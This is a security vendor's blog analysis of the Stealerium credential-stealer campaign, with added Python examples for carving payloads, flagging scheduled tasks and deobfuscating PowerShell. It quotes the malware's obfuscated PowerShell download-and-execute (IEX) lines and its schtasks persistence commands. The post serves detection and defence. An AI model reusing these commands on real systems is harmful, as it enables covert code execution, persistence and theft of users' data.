Deciphering Stealerium Malware: Exploring Evasion Techniques & Insights

Blog author: Karthickkumar Kathiresan

The Uptycs threat research team has recently identified an attack campaign that uses Stealerium, a stealer malware family. It is delivered through Microsoft Office attachments containing malicious macros. Once the macro runs, the stealer harvests sensitive data such as network and system information, screenshots, and login credentials, including those for cryptocurrency wallets.


Stealer malware is, in general, used by cybercriminals focused on harvesting account credentials. Uptycs observed an increase in Stealerium promotion on hacker forums. It is particularly worrisome because its payload is injected into legitimate processes, which makes it harder to detect and remove, as detailed in this technical analysis.


Stealerium is coded in C#, and the Uptycs team identified an open source version of the malware on GitHub. We suspect threat actors modified this version to launch attacks via PowerPoint files. Here the miscreants leverage PowerPoint, but other Office applications could just as easily serve as the lure.

Infection Flow

Figure 1 - Stealerium infection flow


The lure is a PowerPoint add-in file (.ppam), a macro-enabled format that mail filters tuned only to .pptm or .docm attachments may not cover. When opened, it prompts the victim to enable macros. Once macros are enabled, a pop-up window displays a "Loading PDF" message with an OK button; clicking it infects the victim's system.



Figure 2 - PowerPoint execution with pop-up window


Threat actors upload malicious payloads as plain text files to online storage sites, which lets them spread the malware globally with little infrastructure of their own. Stealerium uses PowerShell to download a file named 2.txt from such a site.


Figure 3 shows the Stealerium process flow.



Figure 3 - Stealerium process flow

Technical Analysis

Text file contents (2.txt)

Upon execution, Stealerium terminates PowerPoint and deletes all .ppam files in the Desktop and Downloads folders of the victim's computer, removing the original lure. It then creates a new subfolder in %ProgramData% (MegamindCypher) and places the following four files there, with copies in its startup location (figure 4).



Figure 4 - Dropped files


These copies let the malware survive a reboot with its information-stealing capability intact.



CypherDeptography.~+~

This file has an unusual extension (.~+~) and contains the code for the stealer payload, which is executed by its three JavaScript companions. Because the file is read with Get-Content and piped into PowerShell rather than launched directly, the odd extension does not hinder execution but does sidestep controls that key on script extensions.



Figure 5 - Unknown extension file contains two variables


Two variables (highlighted) are shown in figure 5.

  • AntiCrisper holds the Stealerium payload as a hexadecimal string.
  • GORMAX32 is a string that leads to another layer of encoded data. Once decoded, it turns out to be a combination of a binary and a script file (as follows).
Binary file – The loader DLL. It loads the legitimate .NET utilities RegSvcs.exe and MSBuild.exe, the processes into which the payload is injected (figure 6).
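As an added example (not code from the post or from the Stealerium project), the following Python carves a hex-encoded executable out of a dropped script file of the shape described above: it finds string literals made only of hex digits, decodes them, keeps only those that decode to a PE image (a DOS "MZ" header whose e_lfanew field points at the "PE\0\0" signature), and hashes the result so an analyst can pivot on it. The script text and the 68-byte stub executable are constructed here; the variable name AntiCrisper follows the post, while the second layer behind GORMAX32 is left undecoded because the page does not describe its encoding.

```python
import hashlib
import re
from typing import Optional

# Constructed stand-in for the dropped file: script-style text with one variable that
# holds a hex-encoded executable. _STUB is a hand-built 68-byte image with a valid
# DOS header (MZ magic, e_lfanew = 0x40) followed by the PE signature; it is not the
# real Stealerium payload. The variable names follow the post; the second layer behind
# GORMAX32 is left untouched because its encoding is not described.
_STUB = b"MZ" + b"\x00" * (0x3C - 2) + (0x40).to_bytes(4, "little") + b"PE\x00\x00"
SAMPLE_DROP = (
    'var AntiCrisper = "' + _STUB.hex().upper() + '";\n'
    'var GORMAX32 = "...";\n'
)

# A string literal made only of hex digits; short literals are ignored because a real
# executable is never that small (MIN_HEX_CHARS = 64 bytes' worth).
HEX_LITERAL = re.compile(r'var\s+(\w+)\s*=\s*"([0-9A-Fa-f]+)"')
MIN_HEX_CHARS = 128


def extract_hex_blobs(text: str) -> dict:
    """Map each variable assigned a long, even-length hex literal to its decoded bytes."""
    return {
        name: bytes.fromhex(hexdata)
        for name, hexdata in HEX_LITERAL.findall(text)
        if len(hexdata) >= MIN_HEX_CHARS and len(hexdata) % 2 == 0
    }


def pe_signature_ok(data: bytes) -> bool:
    """True when data starts with 'MZ' and e_lfanew (offset 0x3C) points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def carve_embedded_pe(text: str) -> Optional[dict]:
    """Return the first hex variable that decodes to a PE image, with hashes to pivot on."""
    for name, data in extract_hex_blobs(text).items():
        if pe_signature_ok(data):
            return {
                "variable": name,
                "size": len(data),
                "md5": hashlib.md5(data).hexdigest(),
                "sha256": hashlib.sha256(data).hexdigest(),
            }
    return None


if __name__ == "__main__":
    print(carve_embedded_pe(SAMPLE_DROP))
```

The PE check matters in practice: a dropper may carry several hex blobs (configuration, a second-stage script), and only the one with a valid e_lfanew chain is worth submitting to a sandbox or hashing against threat intelligence.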



Figure 6 - Injection function

Script file – Modifies Windows Defender by adding exclusion paths and file extensions and disabling certain protection features (figure 7). Exclusions added this way are visible to defenders in the Get-MpPreference output (ExclusionPath, ExclusionExtension), so their sudden appearance on an endpoint is a useful hunting signal.



Figure 7 - Windows Defender modification

JavaScript files

The aforementioned JavaScript files launch the stealer payload through PowerShell, and they are scheduled to run at fixed intervals using Windows Task Scheduler.


Drivers.js – Runs a PowerShell command that follows the process flow shown in figure 3 to download the aforementioned 2.txt file from a specific URL.


PowerShell command line:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eP Bypass -c (I'w'r('') -useB) | .('{1}{0}'-f'eX','I') | ping

The command is lightly obfuscated: -eP Bypass disables the execution policy, the split token I'w'r is PowerShell's iwr alias (Invoke-WebRequest; its URL argument is not shown), -useB is -UseBasicParsing, and '{1}{0}'-f'eX','I' evaluates to IeX (Invoke-Expression), so the downloaded text is executed directly in memory without touching disk.

OneDriveUpdate.js and OutlookUpdate.js – These read the CypherDeptography.~+~ file and pipe its contents into PowerShell (Get-Content -Raw | IEX) to run the data-stealing code in memory.

Stealerium payload

This stealer performs the following:

  • Evades detection by antivirus and endpoint detection and response (EDR) systems
  • Collects potentially sensitive information from the targeted system
  • Relays a report of the stolen information to an attacker-controlled server

The payload's description section contains a link to the GitHub project it was built from (figure 8).


Figure 8 - Payload description includes a Github link


It’s coded to extract data from infected devices using various functions (figure 9).



Figure 9 - Payload functions


Delayed Execution

Calling a sleep function to postpone execution helps the malware evade sandbox analysis: automated sandboxes run a sample for a limited time, and a payload that stays idle past that window is likely to be classified as benign.



The malware employs anti-analysis techniques prior to its execution, such as checking for specific tools and environment settings. If it detects it’s running in an environment that would likely be used for analysis, it halts execution to evade detection.


Anti-analysis checks

  • Calls the IsDebuggerPresent() API to check whether a debugger is attached to the process.
  • Checks whether the system is running on an emulator by comparing date and time readings.
  • Compares the system IP address to known IP addresses associated with sandbox environments (e.g., VirusTotal, Any.Run).
  • Checks whether analysis tools are running on the infected system, e.g., Process Hacker, netstat, netmon, TCPView, Wireshark, Filemon, Regmon, Cain.
  • Checks for the presence of specific DLL files commonly loaded in sandboxed environments.
  • Checks the OS environment.


Stealerium logs the victim's keystrokes to log files. It also captures webcam images and desktop screenshots, which are likewise stored locally and then sent to the attacker's server.



The stealer specifically targets Chromium-based (e.g., Chrome, Edge) and Firefox web browsers. It collects and forwards data such as cookies, bookmarks, browsing history, autofill information, passwords, browser extensions, and credit card details. It also targets banking and cryptocurrency services accessed through browsers.


Figure 10 - Gathered sensitive information


Account Information

The malware gathers information from a wide range of other sources as well. This includes Discord tokens, FileZilla host data, autorun modules, directory structure, and data from Outlook email accounts. 


It collects details of VPN clients such as NordVPN, OpenVPN, and ProtonVPN. And it captures session data from popular games such as BattleNet, Minecraft, and Uplay, in addition to messengers (Skype, Element, Telegram, Pidgin) and Crypto Wallets (Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, AtomicWallet, Guarda, Coinomi, Litecoin, Dash, Bitcoin).



Figure 11 - Gathered system information via functions


Victim system information

Stealerium also gathers other data, including IP details, system information, running process data, directory structure details, and more (figure 11). All of it is useful to an attacker for profiling the victim and planning follow-on activity.


The following table lists the types of information it can exfiltrate.


Data Theft

  • Gathers a list of running system processes along with their executable paths, saving them to a "Windows.txt" file.
  • Captures a desktop screenshot to a "Desktop.jpg" file.
  • Walks a built-in list of folders (e.g., Desktop, My Documents, My Pictures, My Videos, Startup, Downloads, Dropbox, OneDrive, TEMP), examining all subfolders and files within, and stores the result as a tree structure.
  • Collects files from specific folders, including Desktop, My Documents, My Pictures, Downloads, Dropbox, OneDrive, and TEMP.
  • Collects system information, including IP, machine, and virtualization details, saving it all to an "info.txt" file.
  • Collects installed application details by running a "SELECT * FROM Win32_Product" WMI query (application name, version, and publisher) and saves them as "Apps.txt". Querying Win32_Product is noisy: Windows Installer performs a consistency check of every installed package, which writes MsiInstaller events to the Application log and makes the query itself an observable artifact.
  • Gathers the execution path and process ID of non-system processes with a "SELECT ExecutablePath, ProcessID FROM Win32_Process" query, saved as "Process.txt".
  • Retrieves the Windows product key from SOFTWARE\Microsoft\Windows NT\CurrentVersion\DigitalProductId in the registry and stores it in "ProductKey.txt".
  • Gathers the system's public IP, local IP, default gateway, user name, computer name, OS version, CPU name, GPU name, amount of RAM, system date, screen metrics, battery information, number of connected cameras, any indication of virtualization software (e.g., VirtualBox, Sandbox, Emulator, Debugger), running process details, any indication of hosting or cloud services, and details of any installed antivirus software.
  • Collects details (e.g., manufacturer, device name, description) of connected cameras with the "SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')" query.
  • Scans available Wi-Fi networks by running "chcp 65001 && netsh wlan show networks mode=bssid". This returns the network name (SSID), signal strength, channel, and BSSID, saved to a "ScanningNetworks.txt" file.

The following lists the startup location, the scheduled tasks, and the command lines used for Stealerium execution.

Stealer Persistence

  • C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CypherDeptography.~+~
  • C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.js
  • C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDriveUpdate.js
  • C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OutlookUpdate.js

Scheduled Task

  • "C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 132 /tn Driversed /F /tr "wscript.exe //b //e:jscript C:\\ProgramData\\MegamindCypher\\Drivers.js"
  • "C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 120 /tn MainChrome /F /tr "wscript.exe //b //e:jscript C:\\ProgramData\\MegamindCypher\\OneDriveUpdate.js"
  • "C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 143 /tn ChromeUAC /F /tr "wscript.exe //b //e:jscript C:\\ProgramData\\MegamindCypher\\OutlookUpdate.js"
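Added example, not code from the post or from Uptycs: a small Python check that a detection engineer could run over process-creation command lines (Sysmon Event ID 1 or Windows Security 4688; task creation is also logged as Security 4698 where object auditing is enabled) to pick out task registrations like the three above. It parses the schtasks /create switches and scores the combination the post shows: a MINUTE-interval trigger, a script host as the action, the //e:jscript and //b wscript flags, and a script path under a user-writable directory such as ProgramData. The three malicious lines are the post's; the benign line and the scoring threshold are constructed.

```python
import re

# Process-creation command lines: the three schtasks invocations quoted in the post,
# plus one constructed benign task so the logic has a negative case to clear.
TASK_CMDLINES = [
    r'"C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 132 /tn Driversed /F /tr "wscript.exe //b //e:jscript C:\\ProgramData\\MegamindCypher\\Drivers.js"',
    r'"C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 120 /tn MainChrome /F /tr "wscript.exe //b //e:jscript C:\\ProgramData\\MegamindCypher\\OneDriveUpdate.js"',
    r'"C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 143 /tn ChromeUAC /F /tr "wscript.exe //b //e:jscript C:\\ProgramData\\MegamindCypher\\OutlookUpdate.js"',
    r'"C:\Windows\system32\schtasks.exe" /create /sc DAILY /st 03:00 /tn NightlyBackup /tr "C:\Program Files\Backup\backup.exe /quiet"',  # constructed benign line
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe")
USER_WRITABLE = ("\\programdata\\", "\\appdata\\", "\\users\\public\\", "\\temp\\")


def parse_schtasks(cmdline: str):
    """Return the /create switches of a schtasks command line as a dict, or None."""
    if not re.search(r'schtasks(?:\.exe)?"?\s+/create\b', cmdline, re.IGNORECASE):
        return None

    def switch(name: str, value: str = r"\S+"):
        m = re.search(rf"/{name}\s+({value})", cmdline, re.IGNORECASE)
        return m.group(1) if m else None

    action = switch("tr", r'"[^"]*"|\S+')  # /tr is usually quoted; accept unquoted too
    return {
        "name": switch("tn"),
        "schedule": (switch("sc") or "").upper(),
        "modifier": switch("mo"),
        "action": action.strip('"') if action else "",
    }


def assess_task(cmdline: str):
    """Score one schtasks /create line; three or more reasons marks it suspicious."""
    task = parse_schtasks(cmdline)
    if task is None:
        return None
    # The logged /tr value carries doubled backslashes; normalise before matching.
    action = task["action"].lower().replace("\\\\", "\\")
    reasons = []
    if task["schedule"] == "MINUTE":
        reasons.append(f"re-runs every {task['modifier'] or '1'} minute(s)")
    if any(host in action for host in SCRIPT_HOSTS):
        reasons.append("action is a script host")
    if "//e:jscript" in action:
        reasons.append("//e:jscript forces the JScript engine regardless of file extension")
    if "//b" in action.split():
        reasons.append("//b batch mode suppresses script errors and prompts")
    if any(d in action for d in USER_WRITABLE):
        reasons.append("script lives in a user-writable directory")
    task["reasons"] = reasons
    task["suspicious"] = len(reasons) >= 3
    return task


if __name__ == "__main__":
    for line in TASK_CMDLINES:
        verdict = assess_task(line)
        print(verdict["name"], "SUSPICIOUS" if verdict["suspicious"] else "ok", verdict["reasons"])
```

The task names (Driversed, MainChrome, ChromeUAC) are deliberately bland, so the rule scores the trigger and action rather than the name; a Chrome-branded task whose action is wscript.exe running a .js file out of ProgramData every two hours is what gives the game away.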


Execution command lines

Powershell iwr -uri -UseB -UseDefaultCredentials | &('MMM'.replace('MMM','I')+'dildo'.replace('dildo','EX'))

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EP Bypass -c Get-Content -RAW C:\ProgramData\MegamindCypher\CypherDeptography.~+~ | .('{1}{0}'-f'eX','I') | ping
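As an added example (not code from the post), this Python deobfuscator undoes the string-building tricks visible in the two command lines above and in the Drivers.js command earlier: the -f format operator ('{1}{0}'-f'eX','I' becomes IeX), .replace() on string literals, + concatenation of literals, and quotes spliced into a bareword (I'w'r becomes Iwr). It then resolves the & and . call operators and flags the cmdlets and switches that surface. Stripping no-op backtick escapes is included as a closely related trick that these particular samples do not use. The three command lines are taken from the post as reproduced there (the download URL is absent in the first two); the indicator labels are my own.

```python
import re

# The three PowerShell command lines quoted in the post. The download URL was already
# absent in the first two as reproduced there, so iwr appears with an empty or missing argument.
SAMPLES = [
    r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eP Bypass -c (I'w'r('') -useB) | .('{1}{0}'-f'eX','I') | ping""",
    r"""Powershell iwr -uri -UseB -UseDefaultCredentials | &('MMM'.replace('MMM','I')+'dildo'.replace('dildo','EX'))""",
    r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EP Bypass -c Get-Content -RAW C:\ProgramData\MegamindCypher\CypherDeptography.~+~ | .('{1}{0}'-f'eX','I') | ping""",
]

QUOTED = r"'([^']*)'"
FORMAT_OP = re.compile(r"'([^']*)'\s*-f\s*('[^']*'(?:\s*,\s*'[^']*')*)", re.IGNORECASE)
REPLACE_CALL = re.compile(r"'([^']*)'\.replace\(\s*'([^']*)'\s*,\s*'([^']*)'\s*\)", re.IGNORECASE)
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
CALL_OP = re.compile(r"[&.]\(\s*'([^']*)'\s*\)")
SPLIT_TOKEN = re.compile(r"""(\w)['"](\w+)['"](\w)""")

# Indicator labels (my own) and the patterns that find them in the deobfuscated, lowercased text.
INDICATORS = {
    "iex": r"\biex\b|invoke-expression",
    "iwr": r"\biwr\b|invoke-webrequest",
    "ep-bypass": r"-e(?:xecutionpolicy|p)\s+bypass",
    "useb": r"-useb(?:asicparsing)?\b",
    "get-content-raw": r"get-content\s+-raw\b",
}


def _fmt(m):
    # .NET-style positional holes {0}{1} map directly onto str.format.
    template, args = m.group(1), re.findall(QUOTED, m.group(2))
    try:
        return "'" + template.format(*args) + "'"
    except (IndexError, KeyError, ValueError):
        return m.group(0)


def deobfuscate(cmdline: str) -> str:
    """Undo the string-building tricks the post shows so the real cmdlets read in plain text."""
    s = re.sub(r"`(?![0abefnrtvu$`])", "", cmdline)  # a backtick before an ordinary char is a no-op escape
    s = FORMAT_OP.sub(_fmt, s)                        # '{1}{0}'-f'eX','I'  ->  'IeX'
    s = REPLACE_CALL.sub(lambda m: "'" + m.group(1).replace(m.group(2), m.group(3)) + "'", s)
    prev = None
    while prev != s:                                  # 'I'+'EX' -> 'IEX', repeated until stable
        prev, s = s, CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", s)
    s = CALL_OP.sub(lambda m: m.group(1), s)          # &('IEX') and .('IeX') -> IEX / IeX
    prev = None
    while prev != s:                                  # I'w'r -> Iwr (quotes spliced into a bareword)
        prev, s = s, SPLIT_TOKEN.sub(r"\1\2\3", s)
    return s


def analyze(cmdline: str) -> dict:
    """Deobfuscate one command line and list the indicators that become visible."""
    plain = deobfuscate(cmdline)
    low = plain.lower()
    return {"deobfuscated": plain,
            "indicators": [key for key, pat in INDICATORS.items() if re.search(pat, low)]}


if __name__ == "__main__":
    for sample in SAMPLES:
        result = analyze(sample)
        print(result["indicators"], "::", result["deobfuscated"])
```

Run the raw logged command line through analyze() before matching it against string-based rules: a rule looking for "iex" or "Invoke-WebRequest" never fires on the original text, but it does on the deobfuscated form, and the download-then-IEX and Get-Content -Raw-then-IEX pairs are the behaviours worth alerting on.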

Conclusion – Detect and Block Stealerium Attacks

To defend against malware attacks such as Stealerium, Uptycs recommends that you:

  • Keep all software and the OS up to date with the latest security patches.
  • Avoid clicking on suspicious links or opening attachments from unknown sources.
  • Use a firewall to block unauthorized access to your computer.
  • Use a strong and unique password for every online account.
  • Rotate passwords regularly so that a stolen credential has a short useful life.

Enterprises must have tight security controls and multi-layered visibility coupled with security solutions to identify and detect malware such as Stealerium. For example: Uptycs’ EDR engine detected Stealerium activity by correlating generic behavioral rules and YARA process scanning capabilities.

Uptycs EDR Detection

In addition to built-in YARA scanning, Uptycs EDR customers can scan for Stealerium using the tool's other detection capabilities. Contextual detection provides details about the identified malware: navigate to the toolkit data section in the detection alert, then click the name of a detected item to reveal its profile (figure 12).



Figure 12 - Uptycs EDR detection

Stealerium IOCs

File Name / MD5 hash

  • PURCHASE ORDER91273_2.ppam
  • Atom.xml (2.txt)
  • Loader DLL
  • Stealerium stealer.exe (Memory)

URLs used by the malware: